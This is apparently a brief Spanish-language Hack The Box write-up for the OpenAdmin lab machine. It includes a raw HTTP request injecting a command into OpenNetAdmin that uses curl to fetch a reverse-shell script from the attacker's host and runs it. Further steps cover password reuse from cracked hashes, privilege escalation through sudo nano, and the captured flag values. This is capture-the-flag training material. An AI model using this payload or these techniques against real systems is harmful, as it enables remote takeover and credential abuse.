HTB{openadmin}
f4d3 f4d3
Recon
Open admin aquí.
POST /ona/ HTTP/1.1
Host: 10.10.10.171
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.171/ona/
Method: POST http://10.10.10.171/ona/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 156
Connection: close
Cookie: ona_context_name=DEFAULT; ONA_SESSION_ID=4aerblt73idp6e282pgkllshv9
Cache-Control: max-age=0
xajax=window_submit&xajaxr=1580249126544&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;/usr/bin/curl 10.10.14.24:8000/reverse.sh > /tmp/f4d3.sh;bash /tmp/f4d3.sh%26&xajaxargs[]=ping
Got shell!
on www/local/config/database_settings.php
21232f297a57a5a743894a0e4a801fc3 md5 admin
098f6bcd4621d373cade4e832627b4f6 md5 test
no sirven de nada, pero podemos reutilizar la pass de la db como jimmy :D
Hacemos un port forwarding… 
el hash
00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1
crack => Revealed
user.txt:c9b2cf07d40807e62af62660f0c81b5f
Root
para el root, vemos que podemos correr nano con sudo :D
GTFOBINS
root.txt:2f907ed450b361b2c2bf4e8795d5b561